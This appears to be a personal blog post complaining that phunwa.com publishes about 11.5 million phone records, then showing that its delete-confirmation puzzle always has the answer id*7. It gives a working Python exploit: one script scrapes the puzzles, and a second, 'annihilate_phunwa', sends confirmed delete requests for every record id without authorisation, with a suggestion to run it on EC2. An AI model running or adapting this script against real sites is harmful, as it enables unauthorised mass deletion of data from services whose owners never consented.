Alright, I can't really call
this an app, it's more like a search engine ... that allows you delete its records.
This website pissed me off as it makes ~11.5 million telephone records and related information(name,address) publicly searchable and indexable. I guess Google has already indexed all of the pages, and even if you delete a record, the information is still accessible in the search result descriptions, not to mention caches.
It supposedly takes its data from
BSNL's searchable but non-indexable
directory.
I can go on about how this is a privacy issue but I'll leave that for another post.
There's a tiny delete button at the bottom that takes you to such a page.
There's an
id parameter (passed through the content body) associated with each telephone record, which I suppose is the database id
of the record.
The numbers of the equation are a textual part of the DOM and can be scraped to automate deletion of a record.
I wrote a Python script to
parse the HTML using regex and retrieve those numbers:
equation = re.compile('([0-9]*[0-9]+)\ \+\ ([0-9]*[0-9]+)')
p_url = 'http://www.phunwa.com/removeentry/'
for counter in range(800000,800005):
params = {
'id':counter,
'Remove this entry':'Remove this number from the site'
}
req = urllib2.Request(url=p_url,data=urllib.urlencode(params))
phunwa = urllib2.urlopen(req)
source = phunwa.read()
numbers = equation.findall(source)
for num in numbers:
print "id: %s | %s + %s = %s" % \
((counter,num[0],num[1],(int(num[0])+int(num[1]))))
Which gives the following output:
id: 800000 | 119805 + 5480195 = 5600000
id: 800001 | 787730 + 4812277 = 5600007
id: 800002 | 534978 + 5065036 = 5600014
id: 800003 | 155396 + 5444625 = 5600021
id: 800004 | 88748 + 5511280 = 5600028
For each increment of the
id, the
answer increments by 7(even though the two numbers themselves are generated different each time) which can only mean one thing:
Whoever designed this thing never heard of re-captcha.
It doesn't even verify if the referrer(which is the URL containing the phone-number associated with the
id) is correct, but that's too much to ask for considering the confirmation method they chose to implement is answer =
id*7
The total number of records could be around 11,547,208. That's the highest the
id goes to before returning a 500.
In theory, it is thus possible to delete every record on Phunwa.com without user-intervention at any point. Except for hiring an EC2 instance and running this script.
import re
import urllib
import urllib2
def annihilate_phunwa():
p_url = 'http://www.phunwa.com/confirmdelete/'
for counter in range(1,11547209):
params = {
'id':counter,
'answer' : (counter*7),
'Confirm Delete' : 'Submit Query'
}
try:
req = urllib2.Request(url=p_url,data=urllib.urlencode(params))
phunwa = urllib2.urlopen(req)
except urllib2.HTTPError,e:
if e.hdrs['Status'] == '500':
print 'id=%s may already be deleted!' % ((counter,))
else: print 'Something else has gone wrong!'
annihilate_phunwa()
I may update this code with one that implements threading.